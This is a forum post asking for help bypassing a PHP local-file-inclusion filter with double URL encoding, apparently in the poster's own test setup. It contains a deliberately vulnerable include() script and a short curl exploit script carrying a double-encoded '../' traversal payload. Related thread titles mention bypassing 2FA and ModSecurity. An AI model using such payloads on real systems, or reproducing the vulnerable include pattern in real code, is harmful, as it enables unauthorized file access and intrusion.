Bypass LFI filter with double encoding
#1
Hi guys,

I'm trying to bypass a lfi filter using double encoding:
https://www.owasp.org/index.php/Double_Encoding

I made three files to see whether it would work, but it doesn't, it will remove everything except the file name.

../include.php: the file I want to include
PHP Code:
<?php
echo"hi";
?>

test.php: lfi filter that I try to bypass
PHP Code:
<?php
error_reporting
(E_ALL);
ini_set('display_errors''On');
$_GET['sFile'] = str_replace("../","",strtolower($_GET['sFile']));
$_GET['sFile'] = str_replace("./","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2e%2f","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2f","",$_GET['sFile']);
include(
$_GET['sFile']);
?>

exploit.php: the script that sends the payload
PHP Code:
<?php
$ch 
curl_init();
/* double encoding of "../" => "%252E%252E%252F" */
curl_setopt($chCURLOPT_URL"http://url/lfitest/tst/test.php?sFile=%252E%252E%252Finclude.php");
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$sOutput curl_exec($ch);
curl_close($ch);
echo 
$sOutput;
?>

Any help would be greatly appreciated.
Thanks in advance!
Reply


Messages In This Thread
Bypass LFI filter with double encoding - by peanutbutter - 04-03-2017, 07:25 PM

Possibly Related Threads…
Thread Author Replies Views Last Post
  Is it possible to bypass two factor authentication? QMark 10 15,161 04-21-2019, 09:38 PM
Last Post: MuddyBucket
  Simple Trick to Bypass File Upload Problem abaykan 2 8,432 05-02-2018, 01:33 PM
Last Post: abaykan
  Possible way to bypass Apache Mod_Security? oxid 1 8,981 08-05-2017, 09:27 PM
Last Post: lunorian
  [Video] Basic LFI and uploading PHP Shell Insider 7 14,883 01-04-2017, 07:29 PM
Last Post: Vector